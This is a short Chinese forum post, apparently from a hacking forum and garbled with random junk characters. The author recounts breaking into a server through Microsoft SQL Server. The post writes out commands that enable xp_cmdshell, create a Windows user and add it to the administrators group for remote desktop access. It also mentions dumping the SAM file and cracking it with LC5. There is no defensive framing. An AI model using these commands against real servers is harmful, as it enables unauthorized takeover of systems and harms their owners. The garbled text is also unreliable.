saitojie

+ ?4 a& K7 h" G. P* T/ P* m
" q0 ]* S8 r( `7 S5 {0 |

% x6 _9 G  j. }# r$ @1 @于是开始找开启语句，对mssql的玩的少，不是太熟悉！4 Z$ J0 M: \% X8 l$ e4 u( }
后来二少给我了语句，便去继续日之
) x, J/ Y7 U, _0 y/ TEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
7 ^* v3 C& }$ M3 n1为开启，0则为关闭！; j; a1 ]  ]# u. |
然后执行
. ?6 o6 e3 j1 F. [EXEC [master].[dbo].[xp_cmdshell] 'cmd /c net user xx xx /add'
+ y2 H. y' N! b% e即可
+ d& V! Y8 h! }. E回过头去看看，发现用户已经成功添加上了！
4 _2 e; q2 {6 B( Q0 z, C" ], q% E

, c0 H7 R; W: \$ a; g( |2 B
我就不明白BKK了，这个地方，你都已经加上用户了，为什么不直接加入到管理组里面，连接服务器的3389呢，为什么还要去下他的SAM，还用LC5去爆力破解呢！~~~~不明白！~~~
$ @, [9 Y5 B8 c; O- jEXEC [master].[dbo].[xp_cmdshell] 'net localgroup administrators username /add'，难道是因为他的3389做了登陆用户的限制？